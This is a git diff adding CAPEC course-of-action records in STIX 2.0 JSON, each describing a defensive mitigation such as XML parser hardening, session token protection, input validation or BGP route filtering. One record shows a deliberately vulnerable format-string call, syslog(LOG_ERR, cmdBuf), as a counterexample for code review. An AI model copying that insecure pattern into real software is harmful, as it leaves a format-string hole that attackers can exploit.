"bundle--8308bbd6-d1bd-4536-8bd5-c63028d04cf5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-221-0", + "description": "This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545.json b/capec/course-of-action/course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545.json new file mode 100644 index 0000000000..ef3dd654c1 --- /dev/null +++ b/capec/course-of-action/course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7c3f28d5-36ee-4d13-bfc0-9610d3a57421", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-62-3", + "description": "In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580.json b/capec/course-of-action/course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580.json new file mode 100644 index 0000000000..d8e238a89a --- /dev/null +++ b/capec/course-of-action/course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5e8da329-54fc-492b-a634-259d24c9f825", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-0", + "description": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--77f86884-ad34-47be-ade7-4900af686435.json b/capec/course-of-action/course-of-action--77f86884-ad34-47be-ade7-4900af686435.json new file mode 100644 index 0000000000..6ebd8349f8 --- /dev/null +++ b/capec/course-of-action/course-of-action--77f86884-ad34-47be-ade7-4900af686435.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b4b33665-31c6-4ecd-ba61-ad031ab7fa08", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--77f86884-ad34-47be-ade7-4900af686435", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-94-0", + "description": "Get your Public Key signed by a Certificate Authority", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--780e2005-b29c-45e0-abad-0738f19408dd.json b/capec/course-of-action/course-of-action--780e2005-b29c-45e0-abad-0738f19408dd.json new file mode 100644 index 0000000000..d2b5a578e1 --- /dev/null +++ b/capec/course-of-action/course-of-action--780e2005-b29c-45e0-abad-0738f19408dd.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b4cd7dc8-9f23-4f2b-93aa-19aacb0110a9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--780e2005-b29c-45e0-abad-0738f19408dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-274-1", + "description": "Design: Do not use HTTP verbs as factors in access decisions.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a.json b/capec/course-of-action/course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a.json new file mode 100644 index 0000000000..9ebb23c509 --- /dev/null +++ b/capec/course-of-action/course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--842d2236-7e5f-487d-a00c-06fbe02a65d1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-100-2", + "description": "If you have to use dangerous functions, make sure that you do boundary checking.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2.json b/capec/course-of-action/course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2.json new file mode 100644 index 0000000000..b01c6d21fe --- /dev/null +++ b/capec/course-of-action/course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--47b619a2-884b-4a45-a058-817b77022509", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-216-1", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7a0f8efa-951a-4a7f-b072-8dd89b09a288.json b/capec/course-of-action/course-of-action--7a0f8efa-951a-4a7f-b072-8dd89b09a288.json new file mode 100644 index 0000000000..3136bd0a1f --- /dev/null +++ b/capec/course-of-action/course-of-action--7a0f8efa-951a-4a7f-b072-8dd89b09a288.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3c234226-cf6e-4d3b-bc91-271577c5c6e2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7a0f8efa-951a-4a7f-b072-8dd89b09a288", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-308-1", + "description": "UDP scanning is complicated by rate limiting mechanisms governing ICMP error messages.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93.json b/capec/course-of-action/course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93.json new file mode 100644 index 0000000000..1e876e88ed --- /dev/null +++ b/capec/course-of-action/course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--138ec581-3918-4ca3-b5f5-3865f29f7317", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-102-1", + "description": "Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7a762e6d-30cc-459f-9650-b3540c4ee9ad.json b/capec/course-of-action/course-of-action--7a762e6d-30cc-459f-9650-b3540c4ee9ad.json new file mode 100644 index 0000000000..3f4e9cc5b0 --- /dev/null +++ b/capec/course-of-action/course-of-action--7a762e6d-30cc-459f-9650-b3540c4ee9ad.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7251f661-f571-4e37-98ba-388367eb60d0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7a762e6d-30cc-459f-9650-b3540c4ee9ad", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-275-2", + "description": "Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b.json b/capec/course-of-action/course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b.json new file mode 100644 index 0000000000..7e038d7078 --- /dev/null +++ b/capec/course-of-action/course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c7a6a6aa-3a3c-4a52-a1d2-6024ce1d2f41", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-640-0", + "description": "Prevent unknown or malicious software from loading through whitelisting policy.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72.json b/capec/course-of-action/course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72.json new file mode 100644 index 0000000000..8f936c6b74 --- /dev/null +++ b/capec/course-of-action/course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7a41c685-e42b-4cbb-bd94-65eb853ba76b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-67-0", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b.json b/capec/course-of-action/course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b.json new file mode 100644 index 0000000000..3a250898da --- /dev/null +++ b/capec/course-of-action/course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7e072ba8-5c4a-41c0-9ad9-8c55e1d449a2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-135-1", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c.json b/capec/course-of-action/course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c.json new file mode 100644 index 0000000000..0f84c904d4 --- /dev/null +++ b/capec/course-of-action/course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e7975b5f-f4b8-454c-87e4-2d8004e3f765", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-142-2", + "description": "Configuration: Disable client side DNS caching.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7c82f8ed-95b9-4f02-a8ea-b2ef0f98caa1.json b/capec/course-of-action/course-of-action--7c82f8ed-95b9-4f02-a8ea-b2ef0f98caa1.json new file mode 100644 index 0000000000..0485fe4d42 --- /dev/null +++ b/capec/course-of-action/course-of-action--7c82f8ed-95b9-4f02-a8ea-b2ef0f98caa1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--faf3c493-4f42-4972-a31e-00713deb43c1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7c82f8ed-95b9-4f02-a8ea-b2ef0f98caa1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-44-3", + "description": "Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b.json b/capec/course-of-action/course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b.json new file mode 100644 index 0000000000..12abaed859 --- /dev/null +++ b/capec/course-of-action/course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d6cb9b10-95a6-4fce-b87a-c02bac973e84", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-77-4", + "description": "Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should be rejected by the program.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7c9cd16d-f622-4abd-b43a-7917cfd404e9.json b/capec/course-of-action/course-of-action--7c9cd16d-f622-4abd-b43a-7917cfd404e9.json new file mode 100644 index 0000000000..6fd0740790 --- /dev/null +++ b/capec/course-of-action/course-of-action--7c9cd16d-f622-4abd-b43a-7917cfd404e9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fefda5e8-5d01-4720-9955-97c4941f40cb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7c9cd16d-f622-4abd-b43a-7917cfd404e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-422-0", + "description": "\n An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.\n Individuals should avoid complying with suspicious requests.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7cb528d0-385d-4f5a-91eb-44e1c2b42d08.json b/capec/course-of-action/course-of-action--7cb528d0-385d-4f5a-91eb-44e1c2b42d08.json new file mode 100644 index 0000000000..3b9f00b63a --- /dev/null +++ b/capec/course-of-action/course-of-action--7cb528d0-385d-4f5a-91eb-44e1c2b42d08.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4681d2a8-293b-4d2e-add7-631f1faef9cc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7cb528d0-385d-4f5a-91eb-44e1c2b42d08", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-474-0", + "description": "\n Restrict access to private keys from non-supervisory accounts\n Restrict access to administrative personnel and processes only\n Ensure all remote methods are secured\n Ensure all services are patched and up to date\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7d1c34a6-521a-45c1-bc71-b4630bbdcd64.json b/capec/course-of-action/course-of-action--7d1c34a6-521a-45c1-bc71-b4630bbdcd64.json new file mode 100644 index 0000000000..8f72a28b3a --- /dev/null +++ b/capec/course-of-action/course-of-action--7d1c34a6-521a-45c1-bc71-b4630bbdcd64.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4960bde5-9f7d-4167-9739-b11251316263", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7d1c34a6-521a-45c1-bc71-b4630bbdcd64", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-584-0", + "description": "\n Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.\n Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16.json b/capec/course-of-action/course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16.json new file mode 100644 index 0000000000..3b3dcf7497 --- /dev/null +++ b/capec/course-of-action/course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5180845e-0da7-4ddd-8ee1-32c5ad5af836", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-0", + "description": "Design: Configure the access control correctly.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933.json b/capec/course-of-action/course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933.json new file mode 100644 index 0000000000..84b97b7d4e --- /dev/null +++ b/capec/course-of-action/course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e7f53d08-8f05-44eb-91d7-f7ee8d4f7616", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-116-0", + "description": "Minimize error/response output to only what is necessary for functional use or corrective language.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7e686f40-c86b-4881-9137-c67559d032a0.json b/capec/course-of-action/course-of-action--7e686f40-c86b-4881-9137-c67559d032a0.json new file mode 100644 index 0000000000..0cd28fe99c --- /dev/null +++ b/capec/course-of-action/course-of-action--7e686f40-c86b-4881-9137-c67559d032a0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--58fa5e51-fb3a-4fdc-aa15-2f4baa78eab1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7e686f40-c86b-4881-9137-c67559d032a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-228-2", + "description": "Implementation: Use XML parsing tools that protect against DTD attacks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7f68adb3-141f-4b73-ac2e-66f76711b5af.json b/capec/course-of-action/course-of-action--7f68adb3-141f-4b73-ac2e-66f76711b5af.json new file mode 100644 index 0000000000..b3ef079c29 --- /dev/null +++ b/capec/course-of-action/course-of-action--7f68adb3-141f-4b73-ac2e-66f76711b5af.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e07fbfcb-1f99-44c0-9b51-90163b87377b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7f68adb3-141f-4b73-ac2e-66f76711b5af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-481-0", + "description": "Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b.json b/capec/course-of-action/course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b.json new file mode 100644 index 0000000000..ef66193e90 --- /dev/null +++ b/capec/course-of-action/course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--77bad901-d1f7-4fe8-8973-e76656d64b88", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-87-0", + "description": "Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--81245812-a329-4abe-8817-6159641985fa.json b/capec/course-of-action/course-of-action--81245812-a329-4abe-8817-6159641985fa.json new file mode 100644 index 0000000000..9cd312f74a --- /dev/null +++ b/capec/course-of-action/course-of-action--81245812-a329-4abe-8817-6159641985fa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bb279490-a99e-4c59-9649-0a6b38a53f8a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--81245812-a329-4abe-8817-6159641985fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-10-0", + "description": "Do not expose environment variable to the user.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--818e3196-faa2-469a-ab7a-6127cf8e09fa.json b/capec/course-of-action/course-of-action--818e3196-faa2-469a-ab7a-6127cf8e09fa.json new file mode 100644 index 0000000000..dd808e6c93 --- /dev/null +++ b/capec/course-of-action/course-of-action--818e3196-faa2-469a-ab7a-6127cf8e09fa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fd8e3d74-a13a-4a6c-9c69-b0d73d6cbe2e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--818e3196-faa2-469a-ab7a-6127cf8e09fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-250-0", + "description": "\n Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XML data or a query.\n Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc.json b/capec/course-of-action/course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc.json new file mode 100644 index 0000000000..00bfba1722 --- /dev/null +++ b/capec/course-of-action/course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6dd42ac6-df63-4e5d-a831-676fcecd07e5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-60-4", + "description": "Encrypt the session data associated with the session ID.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--82e47eb6-c3ad-4ca2-896f-596bab562f50.json b/capec/course-of-action/course-of-action--82e47eb6-c3ad-4ca2-896f-596bab562f50.json new file mode 100644 index 0000000000..a7efa24f7d --- /dev/null +++ b/capec/course-of-action/course-of-action--82e47eb6-c3ad-4ca2-896f-596bab562f50.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ac85de61-d1a3-4807-a64c-167728ad64a8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--82e47eb6-c3ad-4ca2-896f-596bab562f50", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-447-1", + "description": "Ensure that design documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--82f0acf3-ba9d-4c82-861c-d3196fe81e05.json b/capec/course-of-action/course-of-action--82f0acf3-ba9d-4c82-861c-d3196fe81e05.json new file mode 100644 index 0000000000..3e000aa2f9 --- /dev/null +++ b/capec/course-of-action/course-of-action--82f0acf3-ba9d-4c82-861c-d3196fe81e05.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c7a0bb64-7434-4219-8435-e902169f55f7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--82f0acf3-ba9d-4c82-861c-d3196fe81e05", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-27-0", + "description": "Use safe libraries when creating temporary files. For instance the standard library function mkstemp can be used to safely create temporary files. For shell scripts, the system utility mktemp does the same thing.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf.json b/capec/course-of-action/course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf.json new file mode 100644 